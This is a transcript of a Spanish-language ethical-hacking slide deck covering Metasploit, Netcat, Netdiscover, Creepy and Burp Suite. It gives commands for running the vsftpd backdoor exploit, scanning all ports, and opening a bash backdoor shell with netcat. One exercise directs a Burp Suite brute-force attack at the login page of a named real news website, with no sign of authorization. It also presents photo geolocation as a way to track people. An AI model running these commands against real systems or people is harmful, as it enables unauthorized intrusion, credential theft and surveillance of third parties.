Hackers

15
CNDP    Etchical Hacker  Jose G. Rodriguez

Transcript of Hackers

  • CNDP Etchical Hacker

    Jose G. Rodriguez

  • AgendaMetasploitScapyNcatNetdiscoverCreepyBurp Suite

  • MetasploitCuando de seguridad se trata, la revelacin pblica de vulnerabilidades y del cdigo de explotacin que funciona son hoy en da una cosa habitual. Vemos por qu esto puede ser tanto perjudicial como til para asegurar nuestros sistemas.

  • MetasploitEmpezamos primero subiendo los servicios: service postgresql startservice metasploit startLuego: msfconsole

  • Metasploitmsf> use msf> use exploit/unix/ftp/vsftpd_234_backdoorMsf> show optionsMsf > set msf> exploit

  • Information gathering con Metasploitdb_nmap {direccin ip} -p 1-65535 , el comando lo que haces es un escaneo de puertos del objetivo.db_nmap sV {direccin ip} p {puerto de inters}, se determina la version especifica del sistema.

  • NetcatConocido como el Swiss Army knife of hacking tools.Netcat es usado para Banner Grab del OS Fingerprinting ej:Netcat 200.42.213.11 80

  • NetcatPara escuchar coneccionesnetcat -l -p 6996Crear backdoorsnc -l -p 6996 -e /bin/bash

  • NetdiscoverHerramienta activa/pasiva para reconocer redes sin DHCP, cuando se esta haciendo wardriving. netdiscover -i wlan0 (Auto Discover redes)netdiscover -i wlan0 -r 10.0.0.0/8

  • CreepyEs una herramienta de geolocalizacin de fotos, accesible desde la API del servicio de alojamiento de imgenes y a las etiquetas EXIF de las fotos publicadas, eso tambin incluye servicios dealojamientos de imgenes como Flickr, Yfrog o Twitpic

  • Creepy

  • Burp SuiteUna herramienta de intrusin, para realizar poderosos ataques personalizados de encontrar y explotar vulnerabilidades inusuales.

  • http://www.kontrol0.com/2013/06/fuerza-bruta-con-burpsuit.html

  • Fuerza bruta con Burp SuiteRealizar el siguiente ejercicio:http://www.kontrol0.com/2013/06/fuerza-bruta-con-burpsuit.html Hacia el site http://www.noticiassin.com/wp-login.php

    En primer lugar, tiene unPROXYlocal interceptando, esta le permite capturar el trfico entre el navegador y el sitio de destino. A continuacin, puede inspeccionar el trfico capturado y pasarlo a otras herramientas de la suite para su posterior anlisis y pruebas.El reconocimiento de aplicacionesSPIDER. Esta herramienta se puede utilizar para rastrear sitios de destino a revelar el contenido del sitio, detrs de la estructura y otras funcionalidades.La herramientaREPETIDORle permite reenviar manualmente las solicitudes HTTP individuales.Esta es una herramienta muy til ya que le permite realizar cambios rpidos sobre la marcha y ver cmo responde el servidor.La herramientaINTRUDERes otro que se centrar en la actualidad. Esta herramienta le permite realizar cargas a medida para ser utilizados en el ataque a la meta. Es altamente personalizable y limitado slo por su imaginacin.La herramientaSECUENCIADORes til si desea probar la aleatoriedad de las credenciales de sesin. Esto puede ser usado para descubrir la entropa dbil que podra conducir a algo as como la explotacin de Sesin Jacking o un tipo similar de escenario. No voy a estar cubriendo esto hoy, pero usted debera ser capaz de recoger los desechos de este tutorial bsico y luego empezar a probar por su cuenta.La herramientaDECODERes otra til para tener alrededor, ya que puede ser utilizado para decodificar material que usted puede venir a travs de su prueba o tambin puede ser utilizado para realizar tareas comunes como la conversin de texto a HEX. Esto vale la pena jugar con como yo no lo va a cubrir aqu hoy, pero es sencillo y bastante simple de recoleccin.La herramientaCOMPARTERest diseado para permitir llevar a cabo la comparacin visual de cualquiera de los dos artculos.

    *